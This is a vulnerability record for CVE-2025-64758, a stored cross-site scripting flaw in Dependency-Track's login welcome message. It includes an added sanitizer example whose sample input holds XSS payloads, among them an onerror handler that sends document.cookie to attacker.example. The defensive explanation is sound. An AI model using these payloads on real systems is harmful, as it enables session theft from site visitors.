CVE-2025-64758

Source
https://cve.org/CVERecord?id=CVE-2025-64758
Import Source
https://storage.googleapis.com/cve-osv-conversion/osv-output/CVE-2025-64758.json
JSON Data
https://api.osv.dev/v1/vulns/CVE-2025-64758
Aliases
Published
2025-11-17T17:24:27.491Z
Modified
2026-04-02T13:01:05.623887Z
Severity
  • 4.8 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
Summary
@dependencytrack/frontend Vulnerable to Persistent Cross-Site-Scripting via Welcome Message
Details

@dependencytrack/frontend is the Single Page Application (SPA) used in Dependency-Track, an open source Component Analysis platform that allows organizations to identify and reduce risk in the software supply chain. Since version 4.12.0, Dependency-Track users with the SYSTEMCONFIGURATION permission can configure a "welcome message": HTML that is rendered on the login page for branding purposes. When rendering the welcome message, Dependency-Track versions before 4.13.6 did not properly sanitize that HTML, so any script elements, event-handler attributes or javascript: URLs in it were handed to the browser unchanged and executed. Users with the SYSTEMCONFIGURATION permission (i.e., administrators) can therefore plant a stored cross-site scripting payload that runs in the browser of anyone who opens the login page, which is reachable before authentication. The impact lands in the visitor's browser rather than in the application itself, which is what the scope change (S:C) in the CVSS vector above records; the PR:H in the same vector reflects that planting the payload requires an administrator account. The issue has been fixed in version 4.13.6.

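The following is an added example, not code from the Dependency-Track project or its fix. It puts the vulnerable pattern (an administrator-supplied HTML string handed to the DOM as-is, which is what v-html or innerHTML do) next to an element/attribute allowlist sanitizer, and shows what the allowlist removes from a message carrying the three classic payload forms: a script element, an event-handler attribute and a javascript: URL. The sample welcome message, the allowlist and the function names are constructed for this example; the regex-based tokenizer is deliberately small to make the allowlist idea visible, and a production SPA should use a maintained DOM-based sanitizer rather than this code. The `dropped` list also serves as an audit check: running the currently configured welcome message through it on a pre-4.13.6 deployment shows whether it carries markup the login page should never execute.

```javascript
// Added example, not Dependency-Track code. Node.js, no dependencies.

// Constructed sample: branding HTML with three active-content payloads mixed in.
const WELCOME_MESSAGE =
  '<h2>Welcome to <b>ACME</b> Dependency-Track</h2>' +
  '<p>Read the <a href="https://docs.example.test/policy" target="_blank">usage policy</a>.</p>' +
  '<img src="x" onerror="fetch(\'https://attacker.example/?c=\' + document.cookie)">' +
  '<script>alert(document.domain)</script>' +
  '<a href="javascript:alert(1)">Need help?</a>';

// Vulnerable pattern: the string reaches the DOM unchanged, which is what
// v-html / element.innerHTML do. Every element and event handler in it runs
// in the browser of whoever opens the login page.
function renderUnsafe(html) {
  return html;
}

// Allowlist: the elements and attributes a branding blurb actually needs
// (constructed for this example). Anything not listed is dropped, so new
// browser features or encoding tricks never have to be enumerated.
const ALLOWED_TAGS = new Set(['h1', 'h2', 'h3', 'p', 'b', 'i', 'strong', 'em', 'br', 'ul', 'ol', 'li', 'a']);
const ALLOWED_ATTRS = { a: new Set(['href', 'title']) };
// href schemes allowed: http(s), mailto, same-origin paths, fragments.
// javascript:, data:, entity-encoded schemes and protocol-relative //host never match.
const SAFE_HREF = /^(?:https?:|mailto:|\/(?!\/)|#)/i;

// script/style bodies are raw text in HTML; removing only the tags would leave
// the JavaScript source visible on the login page, so remove the whole element.
function stripRawTextElements(html, dropped) {
  return html.replace(/<(script|style)\b[^>]*>[\s\S]*?<\/\1\s*>/gi, (_m, tag) => {
    dropped.push(`element <${tag.toLowerCase()}> with body`);
    return '';
  });
}

// Keep only allowlisted attributes; re-quote values so the output is well formed.
function filterAttributes(tag, attrText, dropped) {
  const allowed = ALLOWED_ATTRS[tag] || new Set();
  const attrRe = /([^\s=\/"'>]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let kept = '';
  for (let m; (m = attrRe.exec(attrText)) !== null;) {
    const name = m[1].toLowerCase();
    const value = (m[2] ?? m[3] ?? m[4] ?? '').trim();
    if (!allowed.has(name)) {            // covers every on* handler, style, srcdoc, ...
      dropped.push(`attribute ${name} on <${tag}>`);
      continue;
    }
    if (name === 'href' && !SAFE_HREF.test(value)) {
      dropped.push(`href with unsafe scheme on <${tag}>`);
      continue;
    }
    kept += ` ${name}="${value.replace(/"/g, '&quot;')}"`;
  }
  return kept;
}

// Returns the sanitized markup plus a list of what was removed. A non-empty
// list for an already configured message means it carries markup that a login
// page should never run (or unsupported branding markup worth reviewing).
function sanitizeWelcomeMessage(html) {
  const dropped = [];
  const safe = stripRawTextElements(html, dropped)
    .replace(/<\/?([a-zA-Z][a-zA-Z0-9]*)\b([^>]*)>/g, (whole, rawTag, attrText) => {
      const tag = rawTag.toLowerCase();
      if (!ALLOWED_TAGS.has(tag)) {
        dropped.push(`element <${tag}>`);
        return '';
      }
      if (whole.startsWith('</')) return `</${tag}>`;
      return `<${tag}${filterAttributes(tag, attrText, dropped)}>`;
    });
  return { html: safe, dropped };
}

// Stand-alone demo: compare the two renderings of the same stored message.
const demo = sanitizeWelcomeMessage(WELCOME_MESSAGE);
console.log('unsafe :', renderUnsafe(WELCOME_MESSAGE));
console.log('safe   :', demo.html);
console.log('dropped:', demo.dropped);
```

Text between tags is left untouched because the browser treats it as inert character data; only markup can introduce script. The known limitation of the tokenizer is that a `>` inside a quoted attribute value ends the tag early, which leaves the remainder as visible text rather than executable markup, so the failure mode is cosmetic rather than a bypass.
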
Database specific
{
    "osv_generated_from": "https://github.com/CVEProject/cvelistV5/tree/main/cves/2025/64xxx/CVE-2025-64758.json",
    "cna_assigner": "GitHub_M",
    "cwe_ids": [
        "CWE-79"
    ]
}
References

Affected packages

Git / github.com/DependencyTrack/frontend

Affected ranges

Type
GIT
Repo
https://github.com/DependencyTrack/frontend
Events
Introduced
0 Unknown introduced commit / All previous commits are affected
Fixed
Database specific
{
    "versions": [
        {
            "introduced": "0"
        },
        {
            "fixed": "4.13.6"
        }
    ]
}
Type
GIT
Repo
https://github.com/dependencytrack/frontend
Events
Introduced
0 Unknown introduced commit / All previous commits are affected
Fixed

Affected versions (the tag list below also contains 4.13.6 and 4.14.0, which the versions block above records as fixed; per the summary, the welcome message feature exists from 4.12.0 and the vulnerable rendering is in 4.12.0 through 4.13.5)

1.*
1.0.0
1.0.0-rc.1
1.1.0
1.2.0
4.*
4.10.0
4.11.0
4.11.1
4.11.2
4.11.3
4.11.4
4.11.5
4.11.6
4.11.7
4.12.0
4.12.1
4.12.2
4.12.3
4.12.4
4.12.5
4.12.6
4.12.7
4.13.0
4.13.1
4.13.2
4.13.3
4.13.4
4.13.5
4.13.6
4.14.0
4.2.0
4.3.0
4.3.1
4.4.0
4.5.0
4.5.1
4.6.0
4.6.1
4.7.0
4.7.1
4.8.0
4.8.1
4.9.0
4.9.1
v1.*
v1.0.0-rc.1
v1.1.0
v1.2.0
v4.*
v4.2.0
v4.5.0
v4.5.1

Database specific

source
"https://storage.googleapis.com/cve-osv-conversion/osv-output/CVE-2025-64758.json"